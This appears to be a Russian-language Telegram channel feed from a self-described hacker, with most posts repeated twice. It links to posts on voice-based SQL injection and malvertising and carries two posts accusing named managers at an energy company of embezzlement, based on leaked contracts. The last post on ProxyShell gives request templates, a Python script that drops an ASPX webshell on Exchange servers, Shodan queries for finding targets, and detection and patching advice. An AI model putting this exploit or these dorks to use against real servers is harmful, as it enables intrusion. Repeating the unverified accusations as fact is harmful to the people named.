Написал небольшую статью, по не сильно популярной (на данный момент) технике sql injection.
Скриншоты и описание были сделаны под тестовую среду, но побудило меня разобраться и сделать этот пост реальный кейс, который к сожалению на данный момент я не могу разглашать.
https://telegra.ph/Voice-Based-SQL-Injection-03-07
P.S вкратце кейс был такой: была строка поиска и был голосовой ввод, если пишешь ковычку - то всё норм, если говоришь её типа quote, то он sql лог вываливал
Скриншоты и описание были сделаны под тестовую среду, но побудило меня разобраться и сделать этот пост реальный кейс, который к сожалению на данный момент я не могу разглашать.
https://telegra.ph/Voice-Based-SQL-Injection-03-07
P.S вкратце кейс был такой: была строка поиска и был голосовой ввод, если пишешь ковычку - то всё норм, если говоришь её типа quote, то он sql лог вываливал
Telegraph
Voice-Based SQL Injection
На днях обнаружил интересную фичу, и решил немного описать принцип работы, постараюсь описать максимально обезличено, чтобы не было понятно какой продукт был (или до сих пор) уязвим к данной технике. 1. Введение С развитием голосовых интерфейсов и голосовых…
👍6
Наш чатик "хацкеров" был заблокирован (непонятно за что, саппорт так и не ответил), поэтому новый открыт, для тех кто потерял "Hiddmond" - заходите https://t.me/hiddmond0
image_2025-03-26_22-10-36.png
77.6 KB
Эм, господа из ФБР, вы могли мне просто на почту или в тг написать... 😆
😁1
Небольшая статья про Malvertising, всё сказанное выдумано, все совпадения случайны
https://telegra.ph/Malvertising-ili-Kak-zarazit-80-000-ustrojstv-cherez-reklamu-06-09
https://telegra.ph/Malvertising-ili-Kak-zarazit-80-000-ustrojstv-cherez-reklamu-06-09
❤4👍1🤯1
#Расследование #газпром #Троицк #часть1
Как отмываются миллионы рублей на строительных работах
В течение последних месяцев мною ведётся тщательное изучение деятельности филиала ПАО «ОГК-2» в городе Троицке (Челябинская область). В результате анализа внутренних документов, смет, актов выполненных работ и наглядных фото с объектов, выявлены признаки масштабного хищения бюджетных средств и злоупотреблений служебным положением.
Фигуранты: Селивёрстов, Птичкин и не только
Изначально подозрения вызывали действия двух должностных лиц — Селивёрстова и Птичкина, однако в процессе изучения документов выяснилось, что круг вовлечённых лиц шире. Более того, за время своей работы в Троицке Селивёрстов, по имеющимся сведениям, приобрёл коттедж, автомобиль и получил наличными несколько миллионов рублей. Это особенно подозрительно, учитывая его официальную зарплату.
Схема: завышение стоимости работ в 10 раз и «освоение» средств
Ключевая схема — завышение стоимости строительных и монтажных работ (СМР), а также оборудования в разы выше рыночной. Пример — строительство бетонных укрытий. Согласно расчётам:
Фактическая себестоимость одного укрытия: 350 000 руб.
Стоимость по договору: 3 360 000 руб.
Разница: 3 010 000 руб. с одного укрытия
Всего таких укрытий — 8
→ Общая «дополнительная маржа» составила 24 080 000 руб.
Эти расчёты подтверждаются сметами, актами КС-2 и справками КС-3, подписанными руководством филиала и подрядчиком ООО «НПП "АИМ"».
Подрядчик — аффилированная компания?
Подрядчиком выступает ООО «НПП "АИМ"» (г. Москва), что уже вызывает вопросы: почему московская компания привлекается для несложных бетонных работ в Челябинской области? Признаки аффилированности или фиктивности подрядной схемы налицо.
Документальное подтверждение
В моём распоряжении:
Акты приёмки выполненных работ и справки о стоимости затрат (КС-2 и КС-3);
Сметные документы и сопроводительное письмо от подрядчика;
Фотофакты с территории Троицкой ГРЭС, подтверждающие реальные объёмы и стоимость работ;
Расчётная таблица по фактической себестоимости и завышенным суммам по контракту.
Заключение
Все вышеперечисленные данные свидетельствуют о систематическом отмывании средств через завышенные подрядные работы и фиктивные схемы. Учитывая суммы, речь идёт о многомиллионных хищениях.
Настоящее сообщение — часть готовящегося пакета документов, который в ближайшие месяцы будет направлен в ОБЭП и иные надзорные органы. Надеюсь на всестороннюю проверку и объективную оценку ситуации компетентными органами.
Как отмываются миллионы рублей на строительных работах
В течение последних месяцев мною ведётся тщательное изучение деятельности филиала ПАО «ОГК-2» в городе Троицке (Челябинская область). В результате анализа внутренних документов, смет, актов выполненных работ и наглядных фото с объектов, выявлены признаки масштабного хищения бюджетных средств и злоупотреблений служебным положением.
Фигуранты: Селивёрстов, Птичкин и не только
Изначально подозрения вызывали действия двух должностных лиц — Селивёрстова и Птичкина, однако в процессе изучения документов выяснилось, что круг вовлечённых лиц шире. Более того, за время своей работы в Троицке Селивёрстов, по имеющимся сведениям, приобрёл коттедж, автомобиль и получил наличными несколько миллионов рублей. Это особенно подозрительно, учитывая его официальную зарплату.
Схема: завышение стоимости работ в 10 раз и «освоение» средств
Ключевая схема — завышение стоимости строительных и монтажных работ (СМР), а также оборудования в разы выше рыночной. Пример — строительство бетонных укрытий. Согласно расчётам:
Фактическая себестоимость одного укрытия: 350 000 руб.
Стоимость по договору: 3 360 000 руб.
Разница: 3 010 000 руб. с одного укрытия
Всего таких укрытий — 8
→ Общая «дополнительная маржа» составила 24 080 000 руб.
Эти расчёты подтверждаются сметами, актами КС-2 и справками КС-3, подписанными руководством филиала и подрядчиком ООО «НПП "АИМ"».
Подрядчик — аффилированная компания?
Подрядчиком выступает ООО «НПП "АИМ"» (г. Москва), что уже вызывает вопросы: почему московская компания привлекается для несложных бетонных работ в Челябинской области? Признаки аффилированности или фиктивности подрядной схемы налицо.
Документальное подтверждение
В моём распоряжении:
Акты приёмки выполненных работ и справки о стоимости затрат (КС-2 и КС-3);
Сметные документы и сопроводительное письмо от подрядчика;
Фотофакты с территории Троицкой ГРЭС, подтверждающие реальные объёмы и стоимость работ;
Расчётная таблица по фактической себестоимости и завышенным суммам по контракту.
Заключение
Все вышеперечисленные данные свидетельствуют о систематическом отмывании средств через завышенные подрядные работы и фиктивные схемы. Учитывая суммы, речь идёт о многомиллионных хищениях.
Настоящее сообщение — часть готовящегося пакета документов, который в ближайшие месяцы будет направлен в ОБЭП и иные надзорные органы. Надеюсь на всестороннюю проверку и объективную оценку ситуации компетентными органами.
👍3🤯2❤1
#газпром #Троицк #часть2
Разоблачение: как через ОГК-2 выводятся сотни миллионов рублей
🔍 В наше распоряжение попали документы, касающиеся контрактов ПАО «ОГК-2» (Вторая генерирующая компания оптового рынка электроэнергии) в филиале г. Троицк. Это сканы договоров, приложений, технических заданий, а также внутренней переписки и актов выполненных работ.
💰 Общая сумма одного лишь договора №22-11/24-200 — 142 083 679,50 рублей без НДС, итоговая сумма с НДС — 170 500 415 рублей.
📄 Документы включают:
Договор на выполнение комплекса работ (дата начала: май 2024, завершение: апрель 2026);
Приложения с техническим заданием, сметой и графиками;
Акты согласования субподрядчиков;
Уведомления о коммерческой тайне;
Подписи и печати всех сторон, включая доверенности.
📌 Ключевые фигуранты:
Подрядчик: ООО «Кордань»;
Заказчик: ПАО «ОГК-2» (Троицкая ГРЭС);
Генеральный директор «Кордань»: Динчук Сергей Александрович;
От имени «ОГК-2» действует Селивёрстов С.А., подписывающий ряд внутренних распоряжений.
❗️ Что вызывает вопросы:
Формальный характер работ — в договоре указано, что «всё выполняется на свой страх и риск», а в акте №3 не указано, какие именно виды работ были выполнены. Подрядчик сам себя проверяет и подписывает акты.
Подписание договора обеими сторонами одними и теми же лицами — Динчук С.А. и Селивёрстов С.А. участвуют в обеих организациях (или действуют по доверенности без контроля).
ООО «Кордань» фигурирует сразу в нескольких подрядных документах с «ОГК-2» — указывается как основной подрядчик и автор технической документации. Однако, никаких подтверждённых работ по этим объектам в публичных источниках нет.
Договоры носят характер отвлечения средств:
В приложении №1 прописаны поставки и монтаж оборудования, но без указания моделей, заводов-изготовителей и смет;
В приложении №8 («Коммерческая тайна») указано, что любые данные о стоимости и объёмах работ не подлежат разглашению.
Субподрядчики согласовываются без конкурса, через уведомления (приложение №12), что противоречит закону №44-ФЗ при расходовании средств госпредприятий.
Условия оплаты:
По пункту 1.6 договора «предусмотрена авансовая выплата до 10% от общей суммы в течение 10 дней с момента подписания»;
Сроки исполнения — 24 месяца, без штрафов за просрочку, если стороны подписывают акт о переносе сроков.
📌 Как выглядит схема?
➡️ 1. Заключается договор на крупную сумму (пример: договор №22-11/24-200 на 170,5 млн).
➡️ 2. Подрядчиком выступает ООО «Кордань», зарегистрированное в Санкт-Петербурге, но деятельность ведёт в Челябинской области.
➡️ 3. В договорах отсутствуют конкретные технические детали: модели оборудования, производителей, заводы-поставщики.
➡️ 4. Внутри документов (приложения 2, 4 и 7) прописано, что качество оценивается самим подрядчиком, а заказчик освобождён от проверок.
➡️ 5. Через согласование фиктивных субподрядчиков и актов формируется «выполненная работа».
➡️ 6. Авансы и последующие платежи уходят на счета ООО «Кордань» и аффилированных компаний, без реального исполнения.
🧾 Из отдельных строк актов:
«...стоимость работ по договору составляет 142 083 679,50 руб. без учёта НДС… все условия выполнены… исполнитель подтверждает отсутствие претензий». — Акт сдачи №3
«...выполняется на свой страх и риск, заказчик не несёт ответственности за технические и экономические последствия». — Приложение №4
🆕 Новый факт:
Также стало известно, что в 2025 году заключён ещё один договор под номером №113 на сумму 90 млн рублей, при этом реальная стоимость выполненных работ составляет всего 3 млн рублей. По свидетельству очевидца, начальник ОТПиР Кинерейш Сергей Андреевич и директор Троицкой ГРЭС Аблулгазизов Руслан Сергеевич отказались давать комментарии и заявили буквально: «Это не ваше дело, пусть отмывает. Идите работайте».
📉 Итог: документы и сообщения указывают на типичную схему по обналичиванию и выводу бюджетных средств через фиктивные подрядные работы, с использованием аффилированных лиц, заранее подписанных актов и формальных согласований.
⚠️ Ущерб бюджету — более 170 млн рублей только по одному договору. По второму (№113) — минимум 87
Разоблачение: как через ОГК-2 выводятся сотни миллионов рублей
🔍 В наше распоряжение попали документы, касающиеся контрактов ПАО «ОГК-2» (Вторая генерирующая компания оптового рынка электроэнергии) в филиале г. Троицк. Это сканы договоров, приложений, технических заданий, а также внутренней переписки и актов выполненных работ.
💰 Общая сумма одного лишь договора №22-11/24-200 — 142 083 679,50 рублей без НДС, итоговая сумма с НДС — 170 500 415 рублей.
📄 Документы включают:
Договор на выполнение комплекса работ (дата начала: май 2024, завершение: апрель 2026);
Приложения с техническим заданием, сметой и графиками;
Акты согласования субподрядчиков;
Уведомления о коммерческой тайне;
Подписи и печати всех сторон, включая доверенности.
📌 Ключевые фигуранты:
Подрядчик: ООО «Кордань»;
Заказчик: ПАО «ОГК-2» (Троицкая ГРЭС);
Генеральный директор «Кордань»: Динчук Сергей Александрович;
От имени «ОГК-2» действует Селивёрстов С.А., подписывающий ряд внутренних распоряжений.
❗️ Что вызывает вопросы:
Формальный характер работ — в договоре указано, что «всё выполняется на свой страх и риск», а в акте №3 не указано, какие именно виды работ были выполнены. Подрядчик сам себя проверяет и подписывает акты.
Подписание договора обеими сторонами одними и теми же лицами — Динчук С.А. и Селивёрстов С.А. участвуют в обеих организациях (или действуют по доверенности без контроля).
ООО «Кордань» фигурирует сразу в нескольких подрядных документах с «ОГК-2» — указывается как основной подрядчик и автор технической документации. Однако, никаких подтверждённых работ по этим объектам в публичных источниках нет.
Договоры носят характер отвлечения средств:
В приложении №1 прописаны поставки и монтаж оборудования, но без указания моделей, заводов-изготовителей и смет;
В приложении №8 («Коммерческая тайна») указано, что любые данные о стоимости и объёмах работ не подлежат разглашению.
Субподрядчики согласовываются без конкурса, через уведомления (приложение №12), что противоречит закону №44-ФЗ при расходовании средств госпредприятий.
Условия оплаты:
По пункту 1.6 договора «предусмотрена авансовая выплата до 10% от общей суммы в течение 10 дней с момента подписания»;
Сроки исполнения — 24 месяца, без штрафов за просрочку, если стороны подписывают акт о переносе сроков.
📌 Как выглядит схема?
➡️ 1. Заключается договор на крупную сумму (пример: договор №22-11/24-200 на 170,5 млн).
➡️ 2. Подрядчиком выступает ООО «Кордань», зарегистрированное в Санкт-Петербурге, но деятельность ведёт в Челябинской области.
➡️ 3. В договорах отсутствуют конкретные технические детали: модели оборудования, производителей, заводы-поставщики.
➡️ 4. Внутри документов (приложения 2, 4 и 7) прописано, что качество оценивается самим подрядчиком, а заказчик освобождён от проверок.
➡️ 5. Через согласование фиктивных субподрядчиков и актов формируется «выполненная работа».
➡️ 6. Авансы и последующие платежи уходят на счета ООО «Кордань» и аффилированных компаний, без реального исполнения.
🧾 Из отдельных строк актов:
«...стоимость работ по договору составляет 142 083 679,50 руб. без учёта НДС… все условия выполнены… исполнитель подтверждает отсутствие претензий». — Акт сдачи №3
«...выполняется на свой страх и риск, заказчик не несёт ответственности за технические и экономические последствия». — Приложение №4
🆕 Новый факт:
Также стало известно, что в 2025 году заключён ещё один договор под номером №113 на сумму 90 млн рублей, при этом реальная стоимость выполненных работ составляет всего 3 млн рублей. По свидетельству очевидца, начальник ОТПиР Кинерейш Сергей Андреевич и директор Троицкой ГРЭС Аблулгазизов Руслан Сергеевич отказались давать комментарии и заявили буквально: «Это не ваше дело, пусть отмывает. Идите работайте».
📉 Итог: документы и сообщения указывают на типичную схему по обналичиванию и выводу бюджетных средств через фиктивные подрядные работы, с использованием аффилированных лиц, заранее подписанных актов и формальных согласований.
⚠️ Ущерб бюджету — более 170 млн рублей только по одному договору. По второму (№113) — минимум 87
👍2
#ProxyShell
В 2021 году сразу три бага в Exchange Server (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) позволили атаковать корпоративную почту без логина
Уязвимость в механизме обработки внешних запросов, позволяющая неавторизованному атакующему:
1. выполнять команды на сервере,
2. загружать вебшеллы,
3. получать доступ к почте и учёткам.
Кратко: через "обход маршрутизации" можно попасть в PowerShell backend Exchange и дальше выполнить любой код.
Как это работает:
- Exchange сервер публикует HTTPS (обычно порт 443) наружу.
- Уязвимость позволяет "обмануть" механизм маршрутизации (X-Rps-CAT + специфический URL).
- В итоге: можно сделать запрос, как будто ты — привилегированный пользователь (SYSTEM).
Запрос на получение почты:
После этого можно цеплять специальные запросы к endpoint’ам Exchange:
Упрощённый пример на питоне сгенерированный чатомгпт (я не проверял работоспособность, у нас свои эксплоиты под это 😆)
Публичные эксплоиты (PoC):
https://github.com/dmaasland/proxyshell-poc
https://github.com/horizon3ai/proxyshell
Шодан:
или
Признаки взлома:
1. Неизвестные .aspx-файлы в /aspnet_client/
2. Странные PowerShell-скрипты в логах
3. Запросы к URL с autodiscover.json?@ и длинными параметрами
Как пофиксить:
1. Поставить последние cumulative updates для Exchange
2. Закрыть внешний доступ к Exchange (используй VPN)
3. Регулярно проверять логи и wwwroot
4. Отключить/мониторить PowerShell Remoting, если не используется
В 2021 году сразу три бага в Exchange Server (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) позволили атаковать корпоративную почту без логина
Уязвимость в механизме обработки внешних запросов, позволяющая неавторизованному атакующему:
1. выполнять команды на сервере,
2. загружать вебшеллы,
3. получать доступ к почте и учёткам.
Кратко: через "обход маршрутизации" можно попасть в PowerShell backend Exchange и дальше выполнить любой код.
Как это работает:
- Exchange сервер публикует HTTPS (обычно порт 443) наружу.
- Уязвимость позволяет "обмануть" механизм маршрутизации (X-Rps-CAT + специфический URL).
- В итоге: можно сделать запрос, как будто ты — привилегированный пользователь (SYSTEM).
Запрос на получение почты:
POST /autodiscover/autodiscover.json?@evil.com/mapi/nspi/ HTTP/1.1
Host: exchange.example.com
Content-Type: application/json
После этого можно цеплять специальные запросы к endpoint’ам Exchange:
POST /mapi/nspi/?MailboxId=<mailbox_id>&a=~1942062522 HTTP/1.1
Host: exchange.example.com
Cookie: X-BEResource=Administrator@exchange.example.com/EWS/Exchange.asmx?a=~1942062522;
Упрощённый пример на питоне сгенерированный чатомгпт (я не проверял работоспособность, у нас свои эксплоиты под это 😆)
import requests
exchange_url = "https://exchange.example.com"
webshell_path = "/aspnet_client/webshell.aspx"
webshell_code = "<%@ Page Language='C#' %><% Response.Write(\"Shell!\"); %>"
headers = {
"Cookie": "X-BEResource=Administrator@exchange.example.com/powershell?~1942062522;",
"Content-Type": "application/x-www-form-urlencoded"
}
data = f"""<r>
<s>New-Item -Path 'C:\\inetpub\\wwwroot\\aspnet_client\\webshell.aspx' -ItemType File -Value '{webshell_code}'</s>
</r>"""
resp = requests.post(f"{exchange_url}/autodiscover/autodiscover.json?@evil.com/powershell/", headers=headers, data=data, verify=False)
print(resp.text)
Публичные эксплоиты (PoC):
https://github.com/dmaasland/proxyshell-poc
https://github.com/horizon3ai/proxyshell
Шодан:
ssl:"Microsoft Exchange"
или
title:"Outlook"
Признаки взлома:
1. Неизвестные .aspx-файлы в /aspnet_client/
2. Странные PowerShell-скрипты в логах
3. Запросы к URL с autodiscover.json?@ и длинными параметрами
Как пофиксить:
1. Поставить последние cumulative updates для Exchange
2. Закрыть внешний доступ к Exchange (используй VPN)
3. Регулярно проверять логи и wwwroot
4. Отключить/мониторить PowerShell Remoting, если не используется
👍1🥰1